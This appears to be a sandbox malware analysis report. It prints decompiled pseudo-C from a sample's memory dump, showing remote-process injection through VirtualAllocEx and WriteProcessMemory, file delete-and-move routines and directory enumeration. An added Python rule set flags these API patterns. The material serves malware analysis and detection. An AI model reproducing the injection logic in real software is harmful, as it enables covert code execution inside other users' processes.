                          							_v288 = _t401;
                          							E005D6610(_t386, 0, _v240);
                          							_t514 = _t514 + 0x14;
                          							_t506 = _v240;
                          							_v292 = 0;
                          							_t404 = _v288;
                          							__eflags = WriteProcessMemory( *(_t508 + 0x70), _v248, _v244, _t506,  &_v292);
                          							if(__eflags == 0) {
                          								goto L21;
                          							}
                          							__eflags = _v292 - _t506;
                          							if(__eflags != 0) {
                          								goto L21;
                          							}
                          							_t390 = _v272;
                          							_t507 =  *(_t390 + _t404 + 0x10);
                          							__eflags = _t507;
                          							if(_t507 == 0) {
                          								L15:
                          								_t471 = _v276;
                          								_t464 = _v284;
                          								__eflags = _t464 - ( *(_t471 + 6) & 0x0000ffff);
                          								if(_t464 >= ( *(_t471 + 6) & 0x0000ffff)) {
                          									goto L27;
                          								} else {
                          									_t316 = _v272;
                          									_t401 = _t404 + 0x28;
                          									__eflags = _t401;
                          									_v284 = _t464 + 1;
                          									continue;
                          								}
                          							}
                          							_t467 =  *(_t508 + 0x60) +  *((intOrPtr*)(_t390 + _t404 + 0x14));
                          							_v292 = 0;
                          							_t404 = _v288;
                          							__eflags = WriteProcessMemory( *(_t508 + 0x70), _v248, _t467, _t507,  &_v292);
                          							if(__eflags == 0) {
                          								goto L21;
                          							}
                          							__eflags = _v292 - _t507;
                          							if(__eflags != 0) {
                          								goto L21;
                          							}
                          							goto L15;
                          						}
                          						goto L21;
                          					}
                          				}
                          			}

                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,00002000,00000040), ref: 005D099C
                          • VirtualAllocEx.KERNEL32(?,00000000,?,00001000,00000004), ref: 005D09C5
                          • WriteProcessMemory.KERNEL32(?,?,?,?,?,?), ref: 005D0A59
                          • VirtualProtectEx.KERNEL32(?,?,?,00000002,?), ref: 005D0AC7
                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 005D0B46
                          • WriteProcessMemory.KERNEL32(?,?,?,00000001,?), ref: 005D0B8D
                          • VirtualAllocEx.KERNEL32(?,?,?,00001000,00000004), ref: 005D0BEE
                          • GetLastError.KERNEL32 ref: 005D0C02
                          • VirtualAllocEx.KERNEL32(?,00000000,?,00002000,00000040), ref: 005D0C1E
                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,00000000,?), ref: 005D0D23
                          • WriteProcessMemory.KERNEL32(?,?,?,00000008,00000000,00000000,?), ref: 005D0D82
                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,00000000,?), ref: 005D0E77
                          • VirtualProtectEx.KERNEL32(?,00000000,?,00000010,00000000,?,?,?,?), ref: 005D0FB0
                          • lstrcmp.KERNEL32(?,?), ref: 005D1157
                          • lstrcmp.KERNEL32(?,?), ref: 005D1174
                          • lstrcmp.KERNEL32(?,?), ref: 005D1191
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: MemoryProcessVirtualWrite$Alloc$lstrcmp$Protect$ErrorLast
                          • String ID:
                          • API String ID: 4278583544-0
                          • Opcode ID: 1ad83edd54a54e768f36cabc1e028bfc44699271b01a5c9c2ce5a4d9357f3ede
                          • Instruction ID: 8f29d51dd69d1eb6784b7862973f9ed6c5cf67e18cfc770abbc2fdba9e7fbef6
                          • Opcode Fuzzy Hash: 1ad83edd54a54e768f36cabc1e028bfc44699271b01a5c9c2ce5a4d9357f3ede
                          • Instruction Fuzzy Hash: 46421170618702AFD734CF69C884B6BBBE5BB88704F14892FE589873A1D770E845DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005D05C0(void* __eflags) {
                          				WCHAR* _t32;
                          				signed int _t34;
                          				WCHAR* _t35;
                          				void* _t36;
                          				void* _t38;
                          				int _t39;
                          				void* _t44;
                          				void* _t45;
                          				void* _t50;
                          				void* _t54;
                          				void* _t56;
                          				short* _t59;
                          				WCHAR* _t60;
                          				void* _t61;
                          				void* _t62;
                          				void* _t64;
                          				signed int _t68;
                          				signed int _t69;
                          				void* _t77;
                          				signed int _t78;
                          				signed int _t83;
                          				signed short* _t84;
                          				WCHAR* _t85;
                          				signed int _t86;
                          				void* _t89;
                          				signed int _t90;
                          				signed int _t91;
                          				signed int _t92;
                          				signed int _t93;
                          				signed short _t98;
                          				WCHAR** _t99;
                          				signed short* _t100;
                          				signed short* _t101;
                          				WCHAR* _t102;
                          				void* _t104;
                          				signed int _t106;
                          				void* _t107;
                          				WCHAR** _t108;
                          				WCHAR** _t109;
                          				WCHAR** _t110;
                          				WCHAR** _t113;
                          				void* _t118;
                          
                          				_t86 = 0;
                          				 *(_t107 + 4) = 0;
                          				 *((intOrPtr*)(_t107 + 0xc)) = 0;
                          				_t32 = E005CB7A0( *0x5d9c40);
                          				_t108 = _t107 + 4;
                          				if(_t32 == 0) {
                          					L57:
                          					return _t86;
                          				}
                          				_t102 = _t32;
                          				_t34 =  *_t32 & 0x0000ffff;
                          				 *_t108 = _t102;
                          				if(_t34 == 0) {
                          					_t60 =  &(_t108[4]);
                          					 *_t60 = 0;
                          					L23:
                          					_t35 = _t60;
                          					L24:
                          					 *_t35 = 0x74002e;
                          					_t35[2] = 0x70006d;
                          					_t35[4] = 0;
                          					_t36 = E005C9FD0(_t60);
                          					_t109 =  &(_t108[1]);
                          					if(_t36 != 0) {
                          						DeleteFileW(_t60);
                          					}
                          					_t109[2] = _t60;
                          					_t38 = E005D7BE0( &(_t109[3]), _t102,  &(_t109[1]),  &(_t109[3]));
                          					_t110 =  &(_t109[3]);
                          					if(_t38 == 0) {
                          						L30:
                          						_t61 = 0;
                          						while(1) {
                          							_t39 = MoveFileW(_t110[1], _t110[2]);
                          							_t86 = 0;
                          							if(_t39 != 0) {
                          								break;
                          							}
                          							Sleep(0x3e8);
                          							_t61 = _t61 + 1;
                          							if(_t61 < 0xa) {
                          								continue;
                          							}
                          							_t62 = 1;
                          							L35:
                          							Sleep(0x3e8);
                          							_t102 =  *_t110;
                          							_t40 = E005C9FD0(_t102);
                          							_t110 =  &(_t110[1]);
                          							if(_t62 != 0 || _t40 != 0) {
                          								goto L55;
                          							} else {
                          								goto L37;
                          							}
                          						}
                          						_t62 = 0;
                          						goto L35;
                          					} else {
                          						_t89 = 0;
                          						while(DeleteFileW(_t102) == 0) {
                          							Sleep(0x3e8);
                          							_t89 = _t89 + 1;
                          							if(_t89 < 0xa) {
                          								continue;
                          							}
                          							goto L30;
                          						}
                          						L37:
                          						_t44 = E005C6270(_t40, _t102, _t110[0x10b], _t110[0x10b]);
                          						_t113 =  &(_t110[3]);
                          						if(_t44 == 0) {
                          							L46:
                          							_t45 = E005C9FD0(_t102);
                          							_t110 =  &(_t113[1]);
                          							if(_t45 != 0) {
                          								DeleteFileW(_t102);
                          							}
                          							_t46 = _t110[1];
                          							if(_t110[1] == 0) {
                          								L51:
                          								_t86 = 0;
                          								_t104 = 0;
                          								while(MoveFileW(_t110[3],  *_t110) == 0) {
                          									Sleep(0x3e8);
                          									_t104 = _t104 + 1;
                          									if(_t104 < 0xa) {
                          										continue;
                          									}
                          									break;
                          								}
                          								L54:
                          								_t102 =  *_t110;
                          								goto L55;
                          							} else {
                          								_t71 = _t110[3];
                          								if(_t110[3] == 0) {
                          									goto L51;
                          								}
                          								E005C6270(_t46, _t102, _t46, _t71);
                          								_t110 =  &(_t110[3]);
                          								_t86 = 0;
                          								L55:
                          								E005C91E0(_t102);
                          								_t42 = _t110[2];
                          								if(_t110[2] != 0) {
                          									E005C91E0(_t42);
                          								}
                          								goto L57;
                          							}
                          						}
                          						Sleep(0xea60);
                          						_t50 = E005C9FD0(_t102);
                          						_t113 =  &(_t113[1]);
                          						if(_t50 == 0) {
                          							goto L46;
                          						}
                          						_t96 = _t113[0x10c];
                          						E005D1F50(_t113[0x10c]);
                          						if( *0x5d9c04 == 0) {
                          							L41:
                          							_t64 = 0x11;
                          							_t86 = 1;
                          							while(E005C7340(_t96) == 0) {
                          								E005D1F50(_t96);
                          								Sleep(0xea60);
                          								_t64 = _t64 - 1;
                          								if(_t64 > 1) {
                          									continue;
                          								}
                          								L44:
                          								_t54 = E005C7340(_t96);
                          								_t102 =  *_t113;
                          								if(_t54 == 0) {
                          									goto L46;
                          								}
                          								_t86 = 1;
                          								goto L55;
                          							}
                          							goto L54;
                          						}
                          						_t56 = E005D6E60(0, _t113[1], 0);
                          						_t113 =  &(_t113[3]);
                          						if(_t56 == 0) {
                          							goto L44;
                          						}
                          						goto L41;
                          					}
                          				}
                          				_t3 = _t102 - 2; // -2
                          				_t84 = _t3;
                          				_t77 = 1;
                          				do {
                          					_t98 = _t84[2] & 0x0000ffff;
                          					_t84 =  &(_t84[1]);
                          					_t118 = _t77 - 0x1ff;
                          					_t77 = _t77 + 1;
                          				} while (_t118 <= 0 && _t98 != 0);
                          				_t90 = _t98 & 0x0000ffff;
                          				if(_t90 == 0x5c) {
                          					L9:
                          					_t68 = 2;
                          					L10:
                          					_t78 = _t77 - 1;
                          					if(_t68 > 0 || _t90 == 0x2e) {
                          						L16:
                          						_t91 = _t78;
                          						goto L17;
                          					} else {
                          						_t100 =  &(_t84[_t68]);
                          						_t93 = _t78;
                          						while(_t84 > _t100) {
                          							_t69 =  *_t84 & 0x0000ffff;
                          							_t93 = _t93 - 1;
                          							_t84 =  &(_t84[0xffffffffffffffff]);
                          							if(_t69 != 0x2e) {
                          								continue;
                          							}
                          							L17:
                          							_t60 =  &(_t108[4]);
                          							 *_t60 = 0;
                          							if(_t91 <= 0) {
                          								goto L23;
                          							}
                          							_t85 =  &(_t102[_t91]);
                          							_t108[4] = _t34;
                          							_t83 = (_t85 +  !_t102 >> 1) + 1;
                          							if(_t91 == 1) {
                          								L21:
                          								_t35 = _t108 + 0x10 + _t83 * 2;
                          								goto L24;
                          							}
                          							_t99 =  &(_t108[4]);
                          							_t59 =  &(_t102[1]);
                          							do {
                          								_t92 =  *_t59 & 0x0000ffff;
                          								_t59 =  &(_t59[1]);
                          								 *_t99 = _t92;
                          								_t99 =  &(_t99[0]);
                          							} while (_t59 < _t85);
                          							goto L21;
                          						}
                          						goto L16;
                          					}
                          				}
                          				_t101 = _t84;
                          				while(1) {
                          					_t68 = 0;
                          					if(_t101 <= _t102) {
                          						goto L10;
                          					}
                          					_t106 =  *_t101 & 0x0000ffff;
                          					_t101 =  &(_t101[0xffffffffffffffff]);
                          					_t102 =  *_t108;
                          					if(_t106 != 0x5c) {
                          						continue;
                          					}
                          					goto L9;
                          				}
                          				goto L10;
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Sleep$File$Delete$Move
                          • String ID: \
                          • API String ID: 3992264990-2967466578
                          • Opcode ID: 31af432dd532d8238786613d86a0ddd1c602e08dbe10a6e575e2abbd2b5a4c7c
                          • Instruction ID: b8de155cd5e759483cc59faa144296b417d38111d191356921b0203339d8d95d
                          • Opcode Fuzzy Hash: 31af432dd532d8238786613d86a0ddd1c602e08dbe10a6e575e2abbd2b5a4c7c
                          • Instruction Fuzzy Hash: 4371E1756043059FDB306B69DC85B2E7BA9FFC0300F05542BE99A873E2EA30D814D792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005D3FA0() {
                          				int _t43;
                          				void* _t45;
                          				void* _t46;
                          				int _t48;
                          				long* _t59;
                          				intOrPtr* _t62;
                          				long _t63;
                          				long _t64;
                          				long _t68;
                          				long _t74;
                          				long _t76;
                          				void* _t81;
                          				void* _t88;
                          				DWORD* _t89;
                          				long _t90;
                          				long _t92;
                          				signed int _t94;
                          				long _t95;
                          				void* _t96;
                          				void* _t97;
                          				DWORD* _t98;
                          				DWORD* _t99;
                          
                          				_t89 = _t98;
                          				 *_t89 = 0;
                          				_t43 = ReadProcessMemory( *(_t98[0x24] + 0x70),  *(_t98[0x24] + 0x94),  &(_t98[3]), 0x70, _t89);
                          				_t63 = 0;
                          				if(_t43 == 0 ||  *_t98 != 0x70) {
                          					L22:
                          					return _t63;
                          				} else {
                          					_t94 = _t98[0x26];
                          					_t90 = 8 + _t94 * 4;
                          					_t45 = E005C3180(_t90, 0);
                          					_t99 =  &(_t98[2]);
                          					if(_t45 == 0) {
                          						goto L22;
                          					}
                          					_t88 = _t45;
                          					_t68 =  &(_t99[0x28]);
                          					 *(_t88 + 4) = _t94;
                          					 *_t88 = _t99[0x25];
                          					_t99[1] = _t68;
                          					_t64 =  *(_t68 - 4);
                          					if(_t94 == 0) {
                          						L7:
                          						_t95 = _t99[0x28];
                          						_t46 = VirtualAllocEx( *(_t95 + 0x70), 0, _t90, 0x3000, 0x40);
                          						if(_t46 == 0) {
                          							_t63 = 0;
                          							L21:
                          							E005C91E0(_t88);
                          							goto L22;
                          						}
                          						_t99[2] = _t64;
                          						 *_t99 = 0;
                          						_t96 = _t46;
                          						_t48 = WriteProcessMemory( *(_t95 + 0x70), _t46, _t88, _t90, _t99);
                          						_t63 = 0;
                          						if(_t48 == 0) {
                          							L18:
                          							_t81 = _t96;
                          							L19:
                          							VirtualFreeEx( *(_t99[0x27] + 0x70), _t81, 0, 0x8000);
                          							goto L21;
                          						}
                          						_t81 = _t96;
                          						if( *_t99 != _t90) {
                          							goto L19;
                          						}
                          						_t63 = 0;
                          						_t99[0xe] = 1;
                          						_t99[0xf] = _t81;
                          						_t99[0x17] = 0;
                          						 *_t99 = 0;
                          						if(WriteProcessMemory( *(_t99[0x24] + 0x70),  *(_t99[0x24] + 0x94),  &(_t99[5]), 0x70, _t99) == 0 ||  *_t99 != 0x70) {
                          							goto L18;
                          						} else {
                          							_t92 = _t99[0x24];
                          							if(E005CB710(ResetEvent( *(_t92 + 0x88)), _t92) == 0) {
                          								goto L18;
                          							}
                          							 *_t99 = 0;
                          							if(ReadProcessMemory( *(_t92 + 0x70),  *(_t92 + 0x94),  &(_t99[5]), 0x70, _t99) == 0) {
                          								goto L18;
                          							}
                          							_t81 = _t96;
                          							if( *_t99 == 0x70 && _t99[0x18] != 0) {
                          								_t74 = _t99[2];
                          								_t63 = 1;
                          								if(_t74 != 0) {
                          									 *_t74 = _t99[0x17];
                          								}
                          							}
                          							goto L19;
                          						}
                          					}
                          					_t59 =  &(_t99[0x27]);
                          					_t99[1] =  &(_t59[2]);
                          					 *(_t88 + 8) = _t59[1];
                          					if(_t94 != 1) {
                          						_t97 = _t94 - 1;
                          						_t62 = _t88 + 0xc;
                          						do {
                          							_t76 = _t99[1];
                          							_t99[1] = _t76 + 4;
                          							 *_t62 =  *_t76;
                          							_t62 = _t62 + 4;
                          							_t97 = _t97 - 1;
                          						} while (_t97 != 0);
                          					}
                          					goto L7;
                          				}
                          			}

                          APIs
                          • ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3FCD
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 005D4070
                          • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 005D4095
                          • WriteProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D40E7
                          • ResetEvent.KERNEL32(?), ref: 005D4104
                          • ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D4135
                          • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,?,00003000,00000040), ref: 005D4175
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Process$Memory$HeapReadVirtualWrite$AllocAllocateEventFreeReset
                          • String ID: p$p$p
                          • API String ID: 569134547-3854358385
                          • Opcode ID: e2f170d7ad36297e4048146f472a912fd19945279644c923a4ccc6405510070c
                          • Instruction ID: 700cd6ff9bfb29502ce1f19f1d59e04ae379d79a6f662e3e91a92e1359af7c50
                          • Opcode Fuzzy Hash: e2f170d7ad36297e4048146f472a912fd19945279644c923a4ccc6405510070c
                          • Instruction Fuzzy Hash: 3A512970604305AFD7309F69C888B6BBBE9FB94744F15852EE9898B360D770EC45CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E005CD4B0() {
                          				long _t50;
                          				signed int _t54;
                          				signed int _t55;
                          				void* _t57;
                          				void* _t61;
                          				void _t64;
                          				long _t70;
                          				void _t72;
                          				signed int _t73;
                          				void** _t75;
                          				signed int _t76;
                          				void* _t77;
                          				WCHAR* _t79;
                          				void* _t81;
                          				void* _t82;
                          				signed int _t83;
                          				WCHAR* _t84;
                          				signed int _t85;
                          				void** _t87;
                          				void** _t89;
                          
                          				_t77 = _t87[0x151];
                          				_t84 =  &(_t87[0x34]);
                          				_t50 = GetFullPathNameW(_t87[0x153], 0x105, _t84, 0);
                          				_t81 = 0;
                          				if(_t50 == 0) {
                          					L23:
                          					E005C91E0(_t81);
                          					_t72 = 0;
                          					_t82 = 0;
                          				} else {
                          					PathAddBackslashW(_t84);
                          					_t73 = 0xfffffefb;
                          					while( *((short*)(_t87 + 0x2dc + _t73 * 2)) != 0) {
                          						_t73 = _t73 + 1;
                          						if(_t73 != 0) {
                          							continue;
                          						} else {
                          							L22:
                          							_t81 = 0;
                          							goto L23;
                          						}
                          						goto L24;
                          					}
                          					_t54 = 0xfffffefb;
                          					_t87[2] = 0x2e002a;
                          					_t87[3] = 0x2a;
                          					while( *((short*)(_t87 + 0x2dc + _t54 * 2)) != 0) {
                          						_t54 = _t54 + 1;
                          						if(_t54 != 0) {
                          							continue;
                          						} else {
                          							goto L22;
                          						}
                          						goto L24;
                          					}
                          					_t75 =  &(_t87[2]);
                          					_t55 = _t54 + 1;
                          					_t83 = 0x2a;
                          					while(1) {
                          						_t76 = _t55;
                          						 *(_t87 + 0x2da + _t55 * 2) = _t83;
                          						if(_t55 == 0) {
                          							break;
                          						}
                          						_t83 =  *_t75 & 0x0000ffff;
                          						_t75 =  &(_t75[0]);
                          						_t16 = _t76 + 1; // 0xfffffefd
                          						_t55 = _t16;
                          						if(_t83 != 0) {
                          							continue;
                          						} else {
                          							 *((short*)(_t87 + 0x2dc + _t76 * 2)) = 0;
                          							_t57 = FindFirstFileW(_t84,  &(_t87[0xb7]));
                          							_t81 = 0;
                          							 *_t87 = _t57;
                          							if(_t57 == 0xffffffff) {
                          								goto L23;
                          							} else {
                          								 *((short*)(_t87 + 0x2dc + _t73 * 2)) = 0;
                          								_t82 = 0;
                          								_t87[1] = 0;
                          								do {
                          									if((_t87[0xb7].dwFileAttributes & 0x00000010) != 0) {
                          										goto L18;
                          									} else {
                          										_t79 = _t84;
                          										_t85 = 1;
                          										_t61 = E005C3180(4, _t87[1]);
                          										_t87 =  &(_t87[2]);
                          										_t81 = _t61;
                          										if(_t61 == 0) {
                          											L25:
                          											FindClose( *_t87);
                          											_t77 = _t87[0x151];
                          											L26:
                          											if(_t85 != 0) {
                          												do {
                          													E005C91E0( *((intOrPtr*)(_t81 + _t85 * 4 - 4)));
                          													_t87 =  &(_t87[1]);
                          													_t85 = _t85 - 1;
                          												} while (_t85 != 0);
                          											}
                          											goto L23;
                          											L29:
                          										} else {
                          											_t64 = E005C3180(0x208, 0);
                          											_t87 =  &(_t87[2]);
                          											 *_t81 = _t64;
                          											if(_t64 == 0) {
                          												goto L25;
                          											} else {
                          												E005D4520( &(_t87[3]), 0x23);
                          												_t89 =  &(_t87[2]);
                          												_push( &(_t89[0xc2]));
                          												E005D68E0( *_t81, 0x105,  &(_t89[4]), _t79);
                          												_t87 =  &(_t89[5]);
                          												_t72 = _t85;
                          												_t84 = _t79;
                          												_t87[1] = _t81;
                          												goto L18;
                          											}
                          										}
                          									}
                          									goto L24;
                          									L18:
                          								} while (FindNextFileW(_t87[1],  &(_t87[0xb7])) != 0);
                          								_t70 = GetLastError();
                          								FindClose( *_t87);
                          								_t77 = _t87[0x151];
                          								_t85 = _t72;
                          								if(_t70 != 0x12) {
                          									goto L26;
                          								}
                          							}
                          						}
                          						goto L24;
                          					}
                          					 *((short*)(_t87 + 0x2da + _t76 * 2)) = 0;
                          					goto L22;
                          				}
                          				L24:
                          				 *_t77 = _t72;
                          				return _t82;
                          				goto L29;
                          			}

Instruction addresses, one per line of the decompiled E005CD4B0 above, in order (0x00000000 marks a decompiler-synthesized line such as a continue or goto that has no instruction of its own):
0x005cd4ba
                          0x005cd4c1
                          0x005cd4d7
                          0x005cd4df
                          0x005cd4e4
                          0x005cd665
                          0x005cd666
                          0x005cd66e
                          0x005cd670
                          0x005cd4ea
                          0x005cd4eb
                          0x005cd4f1
                          0x005cd4f6
                          0x005cd501
                          0x005cd502
                          0x00000000
                          0x005cd504
                          0x005cd663
                          0x005cd663
                          0x00000000
                          0x005cd663
                          0x00000000
                          0x005cd502
                          0x005cd509
                          0x005cd50e
                          0x005cd516
                          0x005cd51e
                          0x005cd529
                          0x005cd52a
                          0x00000000
                          0x005cd52c
                          0x00000000
                          0x005cd52c
                          0x00000000
                          0x005cd52a
                          0x005cd531
                          0x005cd535
                          0x005cd536
                          0x005cd53a
                          0x005cd53a
                          0x005cd53e
                          0x005cd546
                          0x00000000
                          0x00000000
                          0x005cd54c
                          0x005cd54f
                          0x005cd552
                          0x005cd552
                          0x005cd558
                          0x00000000
                          0x005cd55a
                          0x005cd561
                          0x005cd56d
                          0x005cd576
                          0x005cd57b
                          0x005cd57e
                          0x00000000
                          0x005cd584
                          0x005cd58a
                          0x005cd596
                          0x005cd598
                          0x005cd5a0
                          0x005cd5a8
                          0x00000000
                          0x005cd5aa
                          0x005cd5aa
                          0x005cd5ac
                          0x005cd5bb
                          0x005cd5c0
                          0x005cd5c3
                          0x005cd5c7
                          0x005cd681
                          0x005cd684
                          0x005cd68a
                          0x005cd691
                          0x005cd693
                          0x005cd695
                          0x005cd699
                          0x005cd69e
                          0x005cd6a1
                          0x005cd6a1
                          0x005cd6a4
                          0x00000000
                          0x00000000
                          0x005cd5cd
                          0x005cd5d4
                          0x005cd5d9
                          0x005cd5de
                          0x005cd5e1
                          0x00000000
                          0x005cd5e7
                          0x005cd5ee
                          0x005cd5f3
                          0x005cd5fd
                          0x005cd60c
                          0x005cd611
                          0x005cd614
                          0x005cd616
                          0x005cd61e
                          0x00000000
                          0x005cd61e
                          0x005cd5e1
                          0x005cd5c7
                          0x00000000
                          0x005cd622
                          0x005cd630
                          0x005cd638
                          0x005cd643
                          0x005cd649
                          0x005cd653
                          0x005cd655
                          0x00000000
                          0x005cd657
                          0x005cd655
                          0x005cd57e
                          0x00000000
                          0x005cd558
                          0x005cd659
                          0x00000000
                          0x005cd659
                          0x005cd672
                          0x005cd672
                          0x005cd680
                          0x00000000

                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 005CD4D7
                          • PathAddBackslashW.SHLWAPI(?), ref: 005CD4EB
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 005CD56D
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 005CD62E
                          • GetLastError.KERNEL32 ref: 005CD638
                          • FindClose.KERNEL32 ref: 005CD643
                          • FindClose.KERNEL32 ref: 005CD684
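The two "APIs" lists in this section are the per-function summaries an analyst triages first: the ReadProcessMemory / VirtualAllocEx / WriteProcessMemory / VirtualFreeEx sequence at 005D3FCD-005D4175, and the FindFirstFileW / FindNextFileW loop of E005CD4B0 directly above. The following is an added example, not part of the Joe Sandbox report, of a parser for these lines plus a small rule set: a VirtualAllocEx whose printed arguments carry MEM_COMMIT and PAGE_EXECUTE_READWRITE (00003000 and 00000040 in the report) followed by a WriteProcessMemory in the same function is flagged as a remote RWX-allocate-then-write primitive, VirtualFreeEx with MEM_RELEASE (00008000) as a remote release, and the Find* pair as directory enumeration. Argument values are taken exactly as the report prints them; where a line lists more values than the API's documented arity (the WriteProcessMemory line at 005D4095 shows eight), the extra entries appear to be stack contents and are kept but not interpreted. The rule names and the behaviour tags are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed input: the two "APIs" lists from this report section, copied as
# the report prints them (bullets, "?" for unknown arguments, hex values).
INJECT_APIS = """
• ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3FCD
  • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
  • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 005D4070
• WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 005D4095
• WriteProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D40E7
• ResetEvent.KERNEL32(?), ref: 005D4104
• ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D4135
• VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,?,00003000,00000040), ref: 005D4175
"""

ENUM_APIS = """
• GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 005CD4D7
• PathAddBackslashW.SHLWAPI(?), ref: 005CD4EB
• FindFirstFileW.KERNEL32(?,00000000), ref: 005CD56D
• FindNextFileW.KERNEL32(00000000,00000010), ref: 005CD62E
• GetLastError.KERNEL32 ref: 005CD638
• FindClose.KERNEL32 ref: 005CD643
• FindClose.KERNEL32 ref: 005CD684
"""

# Documented Win32 constants used by the rules.
MEM_COMMIT = 0x1000
MEM_RELEASE = 0x8000
PAGE_EXECUTE_READWRITE = 0x40

# One report line: optional "Part of subcall function XXXX:", Api.MODULE,
# optional "(args)", then "ref: address". GetLastError-style lines have no parentheses.
API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report prints "?"
    ref: int                    # call-site address
    subcall: Optional[str]      # address of the nested helper, if the line is a subcall entry


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue   # blank lines and section headers are skipped
        raw = m.group("args")
        args: List[Optional[int]] = []
        if raw:
            for a in raw.split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), m.group("sub")))
    return calls


def classify(calls: List[ApiCall]) -> Set[str]:
    """Tag a function's call list with the behaviours the rules recognise."""
    direct = [c for c in calls if c.subcall is None]   # helper subcalls are not the function's own calls
    names = [c.api for c in direct]
    tags: Set[str] = set()
    for i, c in enumerate(direct):
        if c.api == "VirtualAllocEx" and len(c.args) >= 5:
            alloc_type, protect = c.args[3], c.args[4]
            committed = alloc_type is not None and alloc_type & MEM_COMMIT
            if committed and protect == PAGE_EXECUTE_READWRITE and "WriteProcessMemory" in names[i + 1:]:
                tags.add("remote_rwx_alloc_then_write")
        if c.api == "VirtualFreeEx" and len(c.args) >= 4 and c.args[3] == MEM_RELEASE:
            tags.add("remote_memory_release")
    if "ReadProcessMemory" in names and "WriteProcessMemory" in names:
        tags.add("cross_process_read_write")
    if "FindFirstFileW" in names and "FindNextFileW" in names:
        tags.add("directory_enumeration")
    return tags


if __name__ == "__main__":
    for label, text in (("005D3FCD..005D4175", INJECT_APIS), ("E005CD4B0", ENUM_APIS)):
        print(label, sorted(classify(parse_api_lines(text))))
```

Run against the first list the rules return the three remote-memory tags and nothing else; against E005CD4B0's list only directory enumeration. Because the rules look only at direct calls, the heap helper 005C3180 does not pollute the function's profile, which matters when the same allocator is called from dozens of functions in the dump.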
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Find$CloseFilePath$BackslashErrorFirstFullLastNameNext
                          • String ID: *$*
                          • API String ID: 1945327101-3771216468
